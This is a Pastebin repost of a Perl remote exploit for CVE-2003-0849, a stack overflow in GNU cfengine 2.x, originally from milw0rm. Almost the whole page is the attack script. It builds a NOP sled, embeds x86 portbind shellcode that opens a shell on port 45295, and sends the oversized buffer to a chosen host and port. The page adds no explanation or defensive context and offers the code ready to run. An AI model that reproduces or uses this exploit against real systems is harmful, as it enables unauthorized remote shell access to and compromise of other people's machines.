Advertisement
FlyFar

GNU CFEngine 2.-2.0.3 - Remote Stack Overflow - CVE-2003-0849

Mar 15th, 2024
1,307
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.61 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl -s
  2. # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003.
  3. # forking portbind shellcode port=0xb0ef(45295) by eSDee
  4. # bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE
  5.  
  6. use IO::Socket;
  7. if(!$ARGV[1])
  8. { print "usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\n"; exit(-1); }
  9.  
  10. $host = $ARGV[0];
  11. $port = $ARGV[1];
  12. $nop = "\x90";
  13. $ret = pack("l",0xbfafe3dc);
  14. $shellcode =
  15. "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0".
  16. "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02".
  17. "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80".
  18. "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57".
  19. "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89".
  20. "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50".
  21. "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80".
  22. "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56".
  23. "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd".
  24. "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f".
  25. "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b".
  26. "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80".
  27. "\xeb\x9a";
  28.  
  29.  
  30. $buf = $nop x 2222 . $shellcode . $ret x 500;
  31.  
  32. $socket = new IO::Socket::INET (
  33. Proto  => "tcp",
  34. PeerAddr => $host,
  35. PeerPort => $port,
  36. );
  37.  
  38. die "unable to connect to $host:$port ($!)\n" unless $socket;
  39.  
  40. sleep(1); #you might have to adjust this on slow connections
  41. print $socket $buf;
  42.  
  43. close($socket);
  44.  
  45.  
  46. # milw0rm.com [2003-09-27]
  47.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement